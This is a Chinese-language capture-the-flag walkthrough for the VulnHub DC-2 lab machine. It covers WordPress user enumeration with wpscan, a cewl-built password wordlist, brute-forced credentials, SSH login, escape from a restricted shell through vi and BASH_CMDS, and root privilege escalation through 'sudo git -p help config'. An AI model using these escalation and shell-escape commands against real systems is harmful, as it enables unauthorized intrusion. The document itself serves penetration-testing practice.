信息收集:
靶机地址:https://www.vulnhub.com/entry/dc-2,311/
(1)扫描ip
nmap 192.168.254.0/24 -sn | grep -B 2 '00:0C:29:0D:44:4E'

(2) 发现访问不到了,我们回过去看扫描结果,其实已经告诉我们了没有遵循重定向到http://dc-2/

(3) 访问一个网站时,计算机首先会检查我们的本地hosts文件,那我们直接修改一下hosts文件就好了(修改后本机可以访问)

(4) 在kali里也配置一下hosts (修改后kali里面可以访问到)


(5)访问成功

(6)目录扫描

(7)拼接wp-admin访问到登陆页面

(8)用wpscan --url http://dc-2 -e u 跑出用户名

(9) 用cewl工具爬取dc-2这个网页上的内容,作为爆破的密码字典

(10)爆破出密码
jerry / adipiscing
tom / parturient


getshell:
(1)连接ssh
ssh jerry@192.168.254.151 -p 7744

(2)jerry账号连接不到,换tom账号,连接成功
ssh tom@192.168.254.151 -p 7744

提权:
(1)执行命令发现很多命令无法执行

(2)查看可执行命令,发现vi命令可以执行
compgen -c


(3)vi flag3.txt,提示提权后再看jerry和su

(4)输入
:set shell=/bin/bash
:shell

(5)vi查看
vi flag4.txt

(6)说没有提示,但是最后一句git outta here,应该在提示使用git,但是sudo -l无法查看,不确定,绕过rbash,切到jerry
export -p //查看环境变量
BASH_CMDS[a]=/bin/sh;a //把/bin/sh给a
/bin/bash
export PATH=$PATH:/bin/ //添加环境变量
export PATH=$PATH:/usr/bin //添加环境变量

(7)查看当前权限
su jerry
adipiscing
sudo -l

(8)git拥有root权限,执行命令,提权成功
sudo git -p help config
!/bin/sh

(9)切到root家目录,查看最后一个flag文件
